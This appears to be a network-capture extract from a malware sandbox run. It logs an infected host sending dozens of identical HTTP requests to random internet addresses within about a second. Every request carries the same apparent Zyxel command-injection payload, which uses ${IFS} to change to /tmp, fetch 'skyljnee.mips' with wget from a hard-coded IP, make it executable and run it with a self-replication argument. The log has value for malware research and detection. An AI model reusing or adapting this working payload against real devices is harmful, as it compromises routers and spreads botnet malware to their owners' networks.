                                                        Jan 28, 2024 10:13:02.588592052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6948192.168.2.1437146152.243.91.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588615894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6949192.168.2.1442822141.3.128.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588649035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6950192.168.2.1443552119.177.248.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588668108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6951192.168.2.1435860167.109.65.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588726997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6952192.168.2.145657013.193.127.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588757038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6953192.168.2.1435460190.183.111.102443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588814974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6954192.168.2.1449442186.1.113.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588849068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6955192.168.2.1457900165.69.21.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588886023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6956192.168.2.1453412210.195.248.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588923931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6957192.168.2.145988460.20.53.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588953972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6958192.168.2.1457036109.38.233.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.588973999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6959192.168.2.1457780104.134.171.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589020014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6960192.168.2.144043413.98.50.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589056969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6961192.168.2.1433912196.234.134.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589096069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6962192.168.2.144384094.206.114.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589129925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6963192.168.2.1458650209.161.153.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589173079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6964192.168.2.1434004193.230.176.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589211941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6965192.168.2.1436792126.10.232.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589246988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6966192.168.2.145244486.18.42.152443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589279890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6967192.168.2.143343497.116.4.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589319944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6968192.168.2.144819841.61.209.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589369059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6969192.168.2.14533302.43.69.116443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589418888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6970192.168.2.1447024131.173.81.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589447021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6971192.168.2.1445844216.0.189.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589493990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6972192.168.2.1458230142.149.249.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589596033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6973192.168.2.145596627.76.80.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589638948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6974192.168.2.1440640206.63.245.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589670897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6975192.168.2.1460620144.94.118.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589700937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6976192.168.2.145854637.127.253.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589737892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6977192.168.2.1435282164.204.58.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589776039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6978192.168.2.145222866.243.189.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589812040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6979192.168.2.1452952212.161.2.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589853048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6980192.168.2.145848471.136.115.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589900017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6981192.168.2.145712444.190.14.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589930058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6982192.168.2.1459556107.126.130.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589952946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6983192.168.2.1443412163.247.165.118443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.589998960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6984192.168.2.144782483.55.7.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590038061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6985192.168.2.145406684.14.128.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590071917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6986192.168.2.1448092145.109.100.219443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590090990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6987192.168.2.1454490144.173.96.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590138912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6988192.168.2.1441380197.187.254.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590159893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6989192.168.2.144452218.197.82.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590213060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6990192.168.2.144627261.246.123.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590260029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6991192.168.2.143869248.137.126.24443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590301991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6992192.168.2.1451560220.210.128.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590332031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6993192.168.2.1459598105.33.121.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590380907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6994192.168.2.145101889.37.13.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590409994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6995192.168.2.1441678156.22.132.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590449095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6996192.168.2.1460684222.95.19.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590480089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6997192.168.2.1443160118.106.79.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590513945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6998192.168.2.1455674202.172.89.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590573072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        6999192.168.2.1434606119.12.112.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590600967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7000192.168.2.144179259.67.74.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.590663910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7001192.168.2.14550564.99.248.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:02.605726957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7002192.168.2.1453812179.31.9.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605420113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7003192.168.2.1438548133.10.139.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605463028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7004192.168.2.1450244125.175.30.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605513096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7005192.168.2.143501649.59.182.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605551958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7006192.168.2.1438876116.219.213.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605618954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7007192.168.2.145550050.211.73.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.605652094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7008192.168.2.1439236167.187.166.253443
                                                        TimestampBytes transferredDirectionData
